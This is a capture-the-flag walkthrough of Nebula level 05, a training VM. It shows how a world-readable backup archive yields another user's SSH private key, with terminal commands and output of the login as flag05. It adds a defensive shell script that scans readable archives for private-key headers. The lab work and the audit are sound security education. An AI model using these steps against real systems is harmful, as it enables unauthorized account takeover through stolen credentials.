Level 05
Accessing another user's account by finding an exposed SSH private key in a backup file.
Description
Check the flag05 home directory. You are looking for weak directory permissions.
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Approach
The goal of this level is to exploit weak file permissions to escalate privileges to the flag05 user.
- Inspecting the /home/flag05 directory, we notice a hidden .backup directory that has read/execute permissions for others.
- Inside .backup, there is a compressed tarball file named backup-19072011.tgz.
- We attempt to extract this archive directly, but we fail because we lack write permissions in the .backup directory.
- To circumvent this, we create a temporary directory in /tmp where we have full permissions, and extract the archive there:
  level05@nebula:/home/flag05/.backup$ mkdir /tmp/l05
  level05@nebula:/home/flag05/.backup$ cd /tmp/l05/
  level05@nebula:/tmp/l05$ tar -xvzf /home/flag05/.backup/backup-19072011.tgz
- Extracting the archive reveals a .ssh directory containing an RSA private key (id_rsa), a public key (id_rsa.pub), and an authorized_keys file.
- This private key belongs to the flag05 user. We can use it to authenticate as flag05 over SSH without needing a password.
  level05@nebula:/tmp/l05/.ssh$ ssh -i id_rsa flag05@localhost
- Once logged in as flag05, we simply run getflag to complete the challenge.
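The condition this level relies on can be audited from the defender's side. The shell sketch below is an added example, not part of the original write-up: it lists tar archives under a directory that group or other users can read and reports every member that starts with a private-key header. The function names and the sample tree built by make_sample are constructed for illustration, and a tar that auto-detects gzip on read (GNU tar or bsdtar) is assumed.

```shell
#!/bin/sh
# Added example (not from the original write-up). All function names are
# hypothetical; the sample data below is constructed and is not a real key.

# Print "archive: member" for each member whose first line is a PEM or
# OpenSSH private-key header.
scan_archive() {
    archive=$1
    tar -tf "$archive" 2>/dev/null | while IFS= read -r member; do
        case $member in */) continue ;; esac   # skip directory entries
        if tar -xOf "$archive" "$member" 2>/dev/null | head -n 1 |
            grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
            printf '%s: %s\n' "$archive" "$member"
        fi
    done
}

# Walk ROOT for tar archives whose mode grants read to group or others.
# Only the archive's own mode bits are checked, not its parent directories.
audit_archives() {
    root=$1
    find "$root" -type f \
        \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) \
        \( -perm -g=r -o -perm -o=r \) 2>/dev/null |
    while IFS= read -r archive; do
        scan_archive "$archive"
    done
}

# Build a constructed test tree: DIR/home/.backup/backup-sample.tgz holding
# a .ssh directory with a placeholder "key" and a placeholder public key.
make_sample() {
    dir=$1
    mkdir -p "$dir/src/.ssh" "$dir/home/.backup"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED-NOT-A-KEY' \
        '-----END RSA PRIVATE KEY-----' > "$dir/src/.ssh/id_rsa"
    printf 'ssh-rsa CONSTRUCTED user@example\n' > "$dir/src/.ssh/id_rsa.pub"
    tar -czf "$dir/home/.backup/backup-sample.tgz" -C "$dir/src" .ssh
    chmod 644 "$dir/home/.backup/backup-sample.tgz"
}

# Stand-alone use: sh audit.sh /home
if [ "$#" -gt 0 ]; then
    audit_archives "$1"
fi
```

Any path it reports should have its mode tightened (for example to 600) or be moved out of the home directory, and the key pair inside should be treated as exposed and replaced.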
Output
level05@nebula:/home/flag05$ ls -la
total 5
drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 .
...
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
...
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls
backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ mkdir /tmp/l05
level05@nebula:/home/flag05/.backup$ cd /tmp/l05/
level05@nebula:/tmp/l05$ tar -xvzf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:/tmp/l05$ cd .ssh
level05@nebula:/tmp/l05/.ssh$ ssh -i id_rsa flag05@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account